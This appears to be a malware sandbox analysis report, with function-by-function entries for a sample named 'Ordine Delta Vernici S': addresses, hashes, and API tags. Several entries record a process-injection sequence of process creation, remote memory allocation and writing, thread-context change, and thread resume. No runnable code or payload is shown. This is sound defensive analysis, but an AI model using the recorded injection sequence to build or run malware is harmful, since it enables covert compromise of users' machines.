Instruction Fuzzy Hash: 621136B1D003499FDB10DFAAC48179EFBF8EF88210F10842AD419A7240CB789904CFA5

Function 05CB8D40 Relevance: 1.6, APIs: 1, Instructions: 54
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 05CB8DAE

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f2d428b527ce8fae649eb6f01fe9b040a4d8a8e0e25dace41bd8cc06cb118f6b
Instruction ID: c21fe5590d32bf053d72b470f0e24c8a5283d16b228c76aec38900989a05bc89
Opcode Fuzzy Hash: f2d428b527ce8fae649eb6f01fe9b040a4d8a8e0e25dace41bd8cc06cb118f6b
Instruction Fuzzy Hash: AD1117B1D043499FDB10DFAAC4857DEFBF8AF88710F10842AD519A7240CB799904CFA5

Function 05CB1CD8 Relevance: 1.4, Strings: 1, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h, xrefs: 05CB1DF6

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 9ad4fda93203b3896aa08005774c08ace02ba9c4645135756695adcdc88ed879
Instruction ID: 4d6dd64b1cc7968eaf425baa2172327c21d0c079c087945003d3df7836d375af
Opcode Fuzzy Hash: 9ad4fda93203b3896aa08005774c08ace02ba9c4645135756695adcdc88ed879
Instruction Fuzzy Hash: 50710A75D00629CFEB64DF6AC850BDAB7B2FF89300F1086AAD519A7254DB306E81CF50

Function 0122E410 Relevance: 1.0, Instructions: 983COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a97848d5a6a1ca88fe8d6dfdd39ecbf77fdb6d9ca3e32579fc07faed9d5d80
Instruction ID: 7a6180928ba3c52853360b3358ebab9371e17651ab0635e2556b4fddc4c2e14b
Opcode Fuzzy Hash: c5a97848d5a6a1ca88fe8d6dfdd39ecbf77fdb6d9ca3e32579fc07faed9d5d80
Instruction Fuzzy Hash: 29A2C275A10228DFDB64CF69C984ADDBBB2BF89304F1581E9D509AB325DB319E81CF40

Function 0758F718 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2419968689.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b817a402a074a8ccde4fcd9eed29e06bc4cbbfc4d74bcb838e609d0875b352fc
Instruction ID: d7b05e1ea334dd8e5d6477d65131e99f7f816435af84e46eff18220957fd5609
Opcode Fuzzy Hash: b817a402a074a8ccde4fcd9eed29e06bc4cbbfc4d74bcb838e609d0875b352fc
Instruction Fuzzy Hash: F0D19274E01219CFDB54DFA9D994B9DBBB2BF89300F1081A9D409AB3A5DB31AD81CF50

Function 05CB6B80 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c286b9e46065f0da0ec4236f346b45dca55c98893e9d74d078f88615d02a64b
Instruction ID: d62524601f54436bf53feeebb23287beee4f59f4a14c68535ab1761e64578e82
Opcode Fuzzy Hash: 0c286b9e46065f0da0ec4236f346b45dca55c98893e9d74d078f88615d02a64b
Instruction Fuzzy Hash: C1C1EF74905229CFEB64DF1AD844BEAB7F2BB89304F0085E9D909A7244DBB44AC5CF51

Function 0122A51E Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da5098b163b170ecc772e70d0ab17cff927797678dc018bec82f1a5878ae0e9
Instruction ID: 2131e9ea555a1ab03ad1b48c40d3379f344cce83e436c772e1927197ad3009a4
Opcode Fuzzy Hash: 4da5098b163b170ecc772e70d0ab17cff927797678dc018bec82f1a5878ae0e9
Instruction Fuzzy Hash: EE916B71A01219DFDB08EF7AE88469EBBF3FB89308F14C13AD0199B658EB755845CB41

Function 0758F450 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2419968689.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff4669bd489bb8dd5f89bd27e176805396b35629f68407fb56b28f4d2ed10838
Instruction ID: fae9bb05411690cf34ea8801b6b4df344cbd926a5f5a8b0609ede67940d198d8
Opcode Fuzzy Hash: ff4669bd489bb8dd5f89bd27e176805396b35629f68407fb56b28f4d2ed10838
Instruction Fuzzy Hash: A25138B4E1021ACBCB44DFA9D885AEEBBF2FF89310F14852AD415A7394D7749942CB90

Function 05CB5BE4 Relevance: 1.7, APIs: 1, Instructions: 203
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CB5DCA

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b2ae5f685180cc37786e2cac5cfe71952631c409c5335ca01418cfde96249b63
Instruction ID: dc37ebe066717db3c660d5785bfaf5976ff4745419a67bfc843f89b5d25a4fdf
Opcode Fuzzy Hash: b2ae5f685180cc37786e2cac5cfe71952631c409c5335ca01418cfde96249b63
Instruction Fuzzy Hash: 2B814AB1D002599FEB20CFA9C9857EDBBF2BF48310F148529E855E7244E7B98981CF81

Function 05CB5BF0 Relevance: 1.7, APIs: 1, Instructions: 201
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CB5DCA

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e6f34d3e84ac18c420e287fc83d6e12d984c05fcc722c1644110eee88e480612
Instruction ID: 03f4a6c04e2cb54467a00a2d6ceca9a24820c82fafa364ca896d7bd58d573187
Opcode Fuzzy Hash: e6f34d3e84ac18c420e287fc83d6e12d984c05fcc722c1644110eee88e480612
Instruction Fuzzy Hash: DC8138B1D002599FEB20CFA9C9857EDBBF2BF48310F148529E815E7244E7B99981CF81

Function 05CB8720 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CB87B8

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c8f6f270828272fc84eff0974957af33b00ef8f44a82a42c4e16337f661b8292
Instruction ID: 80d789da906a38617d85228c51797ca5f99b8580e600546eae04d5e1a782fa1f
Opcode Fuzzy Hash: c8f6f270828272fc84eff0974957af33b00ef8f44a82a42c4e16337f661b8292
Instruction Fuzzy Hash: 29213575900349DFDB10DFAAC881BDEBBF5FF48314F108829E919A7240C7789944CBA4

Function 05CB8728 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CB87B8

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 56bc1420326b65301958f4dc90c7473354f746f400d23bef46423e46eba24e9c
Instruction ID: 58ea4ed02d149d5859dfe4c3e285a1e2256f0fda7e343a50ee2b18f5b4a477be
Opcode Fuzzy Hash: 56bc1420326b65301958f4dc90c7473354f746f400d23bef46423e46eba24e9c
Instruction Fuzzy Hash: 7B212475900349DFDB10CFAAC885BDEBBF5FF48314F10882AE919A7240C7789954CBA4

Function 05CB7F09 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05CB7F8E

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 23b6efe9916311c02ba5ce7649d3410b9b6d2e89fdd0c55da959da4c7241ae4d
Instruction ID: 31d35ddd043d10f42f4477c1b90abc16e1226aac35d2186eba68459524961bd7
Opcode Fuzzy Hash: 23b6efe9916311c02ba5ce7649d3410b9b6d2e89fdd0c55da959da4c7241ae4d
Instruction Fuzzy Hash: 102138719043099FEB10DFAAC8857EEBBF4EF88314F148429D519A7340C7789945CFA5

Function 05CB7F10 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05CB7F8E

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: eac1f2e5f219888c477daf1b1428ab11a23d5663dbb9bab4ef175b6259726c66
Instruction ID: d515b3e71a3d2350b79803323da245a04273c4193613a168afda1c74d8e8d328
Opcode Fuzzy Hash: eac1f2e5f219888c477daf1b1428ab11a23d5663dbb9bab4ef175b6259726c66
Instruction Fuzzy Hash: D52115759043099FEB10DFAAC4857EEBBF4EF88314F14842AD919A7240CB789A45CFA5

Function 05CB84A8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CB851E

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 539867886230da2101df04bb43283fd2518f4480bd930a38f45701d00af65982
Instruction ID: 996296f5c04a1a1a068d881218a1926a639c7db73ab6f2b8f804df3338199c00
Opcode Fuzzy Hash: 539867886230da2101df04bb43283fd2518f4480bd930a38f45701d00af65982
Instruction Fuzzy Hash: 6C1159719003499FEF10DFAAC845BDFBBF5EF88320F148819E515A7250C7799904CBA4

Function 05CB84B0 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05CB851E

Memory Dump Source

Source File: 00000000.00000002.2416899950.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cb0000_Ordine Delta Vernici S.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0540a0d8b46da0de699a411dc7a56b6bec24d586acc824d1d82472bd887a8695
Instruction ID: ccbbd5153cf02dc09bc51c50b09a52b14a17e56548e97fc1882351032b563bf5
Opcode Fuzzy Hash: 0540a0d8b46da0de699a411dc7a56b6bec24d586acc824d1d82472bd887a8695
Instruction Fuzzy Hash: CD1126719003499FEB20DFAAC845BDFBBF5AF88310F148819E515A7250C779A644CBA5

Function 0122A320 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21ff6e5990bb8c8279b64029b07e4dd8f9c3caa232e068e33d0290424f836a6
Instruction ID: e306d74005b0e9e8e499b1f75706c208a47d54e839845f5450715c848921ec0e
Opcode Fuzzy Hash: a21ff6e5990bb8c8279b64029b07e4dd8f9c3caa232e068e33d0290424f836a6
Instruction Fuzzy Hash: 99319F70814258EFDB01DFA8E44C7AEBFF2FB06309F6080A7D119A7A56D7754A85CB01

Function 0758B8A8 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2419968689.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e030db102ef98650f9e68a930791ed2860dea176d16baaf8025552d486ecb88
Instruction ID: 4ddeb30606cc33369405f073b1f4b83e8ebf4182904a689255ee56691ea27d76
Opcode Fuzzy Hash: 2e030db102ef98650f9e68a930791ed2860dea176d16baaf8025552d486ecb88
Instruction Fuzzy Hash: C77103B4E16209DFDB44EFA8D598AEDBBB6FB49304F20802AE516BB254C7301D49CF51

Function 0758F178 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2419968689.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef688cc97425c8be0d332a8ba78099a6a44e877f61423299b22edd29be0f50b0
Instruction ID: da6ae035e9a483e58d34a1be4b66047ec5da5a86cda65166e534962b91eed5c3
Opcode Fuzzy Hash: ef688cc97425c8be0d332a8ba78099a6a44e877f61423299b22edd29be0f50b0
Instruction Fuzzy Hash: 765148B4E00209DFDB84EFAAE8846EEBBF2FB89304F508169D415A7394DB755945CF80

Function 01220868 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 632166155e5bc59c961a8ce46f1e6d6ec715704bf2c07a294b88be6d2f0f869f
Instruction ID: 67429f7da95d27e214e310bf1faba623828cbef1cac63f4348c34c974352128f
Opcode Fuzzy Hash: 632166155e5bc59c961a8ce46f1e6d6ec715704bf2c07a294b88be6d2f0f869f
Instruction Fuzzy Hash: BA419135F1021A9FDB18DF69D4546AEB7F6BF88710F108569E906EB364EF709841CB80

Function 012209CE Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed58cf7787ec42dcb052f924a564730314e0f01ebd4963f531d413b2799b8290
Instruction ID: fd3a5606856d9acd1583a1f87c6ed67d63aacf4ffe921bd64ba451b1cfd89bdc
Opcode Fuzzy Hash: ed58cf7787ec42dcb052f924a564730314e0f01ebd4963f531d413b2799b8290
Instruction Fuzzy Hash: 4541BE307102159FCB18AB78C198AAE3BF2BF89704F54056CE506AB3A1CF71AC45CB91

Function 0122136D Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d1e919026fdd257a730cd84300578bd7bddb0033dd8981d2c80dde0e0bfdcf
Instruction ID: 89a22d68b493ba70520b2959a223f11fe623be5e7e759a7094c4c56500cc0b2c
Opcode Fuzzy Hash: f8d1e919026fdd257a730cd84300578bd7bddb0033dd8981d2c80dde0e0bfdcf
Instruction Fuzzy Hash: 70418D70D01299EFDB10CFA9C590ADEBFF2FF49750F24806AE549AB251CB349915CB90

Function 01220A01 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9c46f77e085b7f128bfb8b98755bdcd6d5e5f026b119ff8d522b59ec8c79d9
Instruction ID: 79f2fdd652836f4c35b8bdf1cafb9d1ce62be5d5c16f55808c797784f83266a7
Opcode Fuzzy Hash: af9c46f77e085b7f128bfb8b98755bdcd6d5e5f026b119ff8d522b59ec8c79d9
Instruction Fuzzy Hash: EA313B307102159FCB18AB78D194A6D3BF2BF89715F244968E506AB3A4CF75AC46CB81

Function 01221378 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc7f4b45f8f225a23232e5677a6208fb4faff9c274f7ce84fcea2ab2a826102
Instruction ID: 3e87e3eeaef7ed292ec3a9ae513da3b5be3b2558dd60fcc1237f491e4c0ec36c
Opcode Fuzzy Hash: 3dc7f4b45f8f225a23232e5677a6208fb4faff9c274f7ce84fcea2ab2a826102
Instruction Fuzzy Hash: 61312670D01259AFDB14CFAAC590ADEBFF6FF48740F248029E909AB354DB749941CBA0

Function 07576851 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2419968689.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4cc99f17e399fd942ce5309f47251cea61631aa43df1ed5bfd7482abb756eb6
Instruction ID: b28c8124b383531518fbc545b09bcd6017cf818fba44a276f07c74e5ca8c4665
Opcode Fuzzy Hash: b4cc99f17e399fd942ce5309f47251cea61631aa43df1ed5bfd7482abb756eb6
Instruction Fuzzy Hash: 3D41B2B4A00229CFCB68DF28D998ADAB7F1FB48304F1085E9E919A7245D7349ED5CF50

Function 011DD01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2400972860.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11dd000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424c1f9ae211a9d0c399349003ed22b9528793c1f43f4832836c0da50b08450f
Instruction ID: 4407ebd9c0d92a649abed5771456bc76efb7a089c8af09f1094beab795fc851a
Opcode Fuzzy Hash: 424c1f9ae211a9d0c399349003ed22b9528793c1f43f4832836c0da50b08450f
Instruction Fuzzy Hash: 2521F572504244DFDF19DF58E9C4B26BF65FBC4354F248569E9090B282C336D45ACBA2

Function 0122A400 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 590fa572b3ef6761e43c17fc06bbc0e39cf2d02589a2b463ac53dea066fbd863
Instruction ID: e0ed31bb816af585d4a7dc5e34b4e17a8f2f5a9cf8fc3312b8f278b5bc3d4a42
Opcode Fuzzy Hash: 590fa572b3ef6761e43c17fc06bbc0e39cf2d02589a2b463ac53dea066fbd863
Instruction Fuzzy Hash: A6217F70D14218EFDB00DFA8E04C7ADBBF1FB09309F6090A6D119A7A45D7748A85CF01

Function 07570394 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2419968689.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c415b77bc0e816ba7f2b34085759c07657d2de2acaf79e8235aa99a853d4649c
Instruction ID: ad4239e2db460c2e82d0f683ee5b9a44d7c12692fdddf76dbf5913a4de9f05c6
Opcode Fuzzy Hash: c415b77bc0e816ba7f2b34085759c07657d2de2acaf79e8235aa99a853d4649c
Instruction Fuzzy Hash: 32319279A12129CFCBA4DF28D994AD9B7F1FB4A304F0041E5E919A7B54D7309E81CF81

Function 011DD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2400972860.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11dd000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc359a4f864228bd326e04de07bc4bce6c7feb5c12474030add70a7533adc95a
Instruction ID: 40ccb66a01a898995b4798bd3ddc8ac03ca7a57a70f1eb0bb3c4767a3d12e761
Opcode Fuzzy Hash: cc359a4f864228bd326e04de07bc4bce6c7feb5c12474030add70a7533adc95a
Instruction Fuzzy Hash: AD21CF76509380CFCB07CF24D994B15BF71EB85314F2881EAD8448B693C33AD41ACB62

Function 0122F5F8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef55a754d59051076003d36cb695dce3dcd903098b7a45d2322b9123afead36
Instruction ID: 88ed34e1a17f8ba76fcf35a32b2f093bcc317f8509c5e80afd53cd58dbcaea2f
Opcode Fuzzy Hash: 2ef55a754d59051076003d36cb695dce3dcd903098b7a45d2322b9123afead36
Instruction Fuzzy Hash: 051129B0D1421ADFDB24DFA9D5456FEBBF6FB88310F108026D624B3250D7745A46CBA0

Function 011BD785 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2400884988.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11bd000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9392aabbeec1dbcd2e1a5f49952aaa580688def669333445f6795be1b201293c
Instruction ID: bcd2773db0c6fed98a6594cea037129f0c032bd1c33e5fb5c7ceae5df751d27c
Opcode Fuzzy Hash: 9392aabbeec1dbcd2e1a5f49952aaa580688def669333445f6795be1b201293c
Instruction Fuzzy Hash: 0E01D831104780DAEB1C4B69D9C4BD6BF98DB4172CF148419EE044A282C7789440C672

Function 01220840 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0697ffdc976b953d77074b89b754827fa4fb319835a05c04130e4203e715ee6
Instruction ID: 8b7d829a28150b4bec6ebd9dccf41bff365452d83b6b61921faccf5e7ae2cb8d
Opcode Fuzzy Hash: f0697ffdc976b953d77074b89b754827fa4fb319835a05c04130e4203e715ee6
Instruction Fuzzy Hash: F0F09E279311A077CA150B7C48E44CF3F31DA86A10B4101F7FA82E7252C621840682CB

Function 075780F7 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2419968689.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c5163efdf9b8a999cf8e082c5a39d8be364d7442a487c32b4dd4aeddf98e606
Instruction ID: 02d34240ae39db31a71688946bca15cb29f9c12db9c6c8a834700b74414eca30
Opcode Fuzzy Hash: 5c5163efdf9b8a999cf8e082c5a39d8be364d7442a487c32b4dd4aeddf98e606
Instruction Fuzzy Hash: 9F11D678A01268CFD764DF28D994ADAB7B1FB98354F5042E5D91DA3385C7309E86CF40

Function 011BD784 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2400884988.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11bd000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab461bfb82d2a2bd70ec95df0228a16cabe5b58de7b8d5603fe131d39b98b449
Instruction ID: 5a8323819dd67f83035dc5f38c002c862301937d7ed4fd7c4ffcfd9a74bfa0ba
Opcode Fuzzy Hash: ab461bfb82d2a2bd70ec95df0228a16cabe5b58de7b8d5603fe131d39b98b449
Instruction Fuzzy Hash: B6F06271505784EFEB258F19D8C4BA6FFE8EB41728F18C45AED084A287C3799845CA71

Function 01220B3C Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0730689140ee73fea833f45134e469e8816715d2a0b07fd71549ed701f29235f
Instruction ID: 1b2b97397779ba44ee2274979440f9990fe5c74542f744306333646171e40da4
Opcode Fuzzy Hash: 0730689140ee73fea833f45134e469e8816715d2a0b07fd71549ed701f29235f
Instruction Fuzzy Hash: EFF06570A10219BFDF319F94C919BAD7FF1EB0C359F144918E111AA191E7F50442DF55

Function 0122F3E8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2401196701.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1220000_Ordine Delta Vernici S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdfa5d355d3bc407a1c21f4e26197f1f4d929fb26bbf565d71dfdfcc5563404d
Instruction ID: 8d0b141fdb6e208b9b6e9eeebd2906c221b51494ebb2595a5634a10cb9bf4205
